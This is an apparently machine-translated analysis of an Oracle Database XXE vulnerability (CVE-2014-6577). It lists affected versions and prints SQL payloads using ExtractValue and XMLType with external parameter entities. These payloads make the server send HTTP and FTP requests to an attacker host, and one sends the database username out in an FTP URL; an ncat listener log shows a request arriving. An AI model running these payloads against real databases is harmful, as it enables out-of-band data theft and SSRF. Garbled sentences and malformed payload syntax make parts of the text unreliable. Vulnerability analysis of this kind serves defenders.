Oracle Database XXE Injection Vulnerability Analysis (cve-2014-6577)

In this article, we will work together to analyze the Oracle database's XXE Injection Vulnerability (cve-2014-6577), which was released by Oracle on January 20 with patches for this vulnerability.

For XXE related knowledge, you can check the security pulse station in another article, "Unknown attack to know how to prevent--xxe loopholes defense."

Vulnerability Description

The XML parser module of an Oracle database is easily injected by XML external entities (XML External entity, XXE).

Affected versions: 11.2.0.3, 11.2.0.4, 12.1.0.1 and 12.1.0.2

Required Permissions: Create session

Technical Details

Because of the security features of the XML parser in Oracle, the external schema is resolved, but not resolved.

This can prevent some XXe injection attacks, such as reading local files on the remote database server.

However, an attacker could send a specially crafted SQL query to trigger an XML parser that would trick the server into connecting a remote resource over HTTP or FTP.

This can result in data leaks due to out-of-band channels, performing port scans on remote internal systems, performing server-side request forgery (SSRF) attacks, or causing denial-of-service attacks (DoS).

Vulnerable URI Handler:

• http
• Ftp:

0x01

Oracle's XML parser can be triggered by invoking the Extractvalue () function on an XML type object. Here is a simple example that uses a simple XXe injection payload to construct a query statement:

Select Extractvalue (XmlType (' <! ENTITY XXe SYSTEM "etc/passwd" >]> "| | ' & ' | | ' XXe; '), '/L ') from dual;

Executing the above query statement will cause the following error:

ORA-31001: Invalid resource handle or path name "/etc/passwd"
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31001. 00000 - "Invalid resource handle or path name \"%s\""
*Cause: An invalid resource handle or path name was passed to
the XDB hierarchical resolver.
*Action: Pass a valid resouce handle or path name to the hierarchical
resolver.

This is because the file URI handler is converted to a xdb library path.

0x02

However, replacing the HTTP URI handler with a query will create another problem. The sample query code is as follows:

Select Extractvalue (XmlType (' <! ENTITY XXe SYSTEM "http://IP/test" >]> "| | ' & ' | | ' XXe; '), '/L ') from dual;

The database server error is as follows:

ORA-31020: The operation is not allowed, Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31020. 00000 - "The operation is not allowed, Reason: %s"
*Cause: The operation attempted is not allowed
*Action: See reason and change to a valid operation.

This error indicates that the FTP and HTTP URI handlers may be accepted by the XML parser. Note that the above query statement does not send any HTTP requests to the attacker's system.

0x03

Let's look at another XXe injection payload, this time referencing a parameter entity instead of a document entity:

select extractvalue(xmltype(‘<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>‘),‘/l‘) from dual;

The same error (ORA-31020) is generated by the database server when executing the query statement. However, this time successfully tricked the server into submitting an HTTP request to the resource "test". The following is an HTTP log on the attacker's server:

ncat -lvp 80
Ncat: Version 6.25 ( http://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from DB_IP.
Ncat: Connection from DB_IP:27320.
GET /test HTTP/1.0
Host: DB_IP
Content-Type: text/plain; charset=utf-8

Traditionally, in order to force the server to send HTTP requests to external resources, an attacker would need permission to access the Utl_http package. Because Extractvalue () is available to all database users, XXe injection introduces another way to trigger out-of-band HTTP requests, and the implementation of this method does not require the permission mentioned above.

0x04

The FTP URI handler (ftp:) can also be used to trigger an Oracle XML parser. The following is an example of a query statement that sends a database user name as an FTP user name:

Select Extractvalue (XmlType (' <?xml version= "1.0" encoding= "UTF-8"? ><! DOCTYPE Root [<! ENTITY% remote SYSTEM "ftp://" | | user| | ': [email protected]/test >%remote; %PARAM1;] > '), '/L ') from dual;

The database server prompts for an error (note that the error code differs from the above because the supplied voucher cannot be used to log on to the remote FTP server) as follows:

ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00202: could not open "ftp://SYSTEM:[email protected]/test" (error 402)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31011. 00000 - "XML parsing failed"
*Cause: XML parser returned an error while trying to parse the document.
*Action: Check if the document to be parsed is valid.

As you can see, the database user name is included as an FTP user name in the FTP traffic sent to the attacker's server:

Oracle Database XXE Injection Vulnerability Analysis (cve-2014-6577)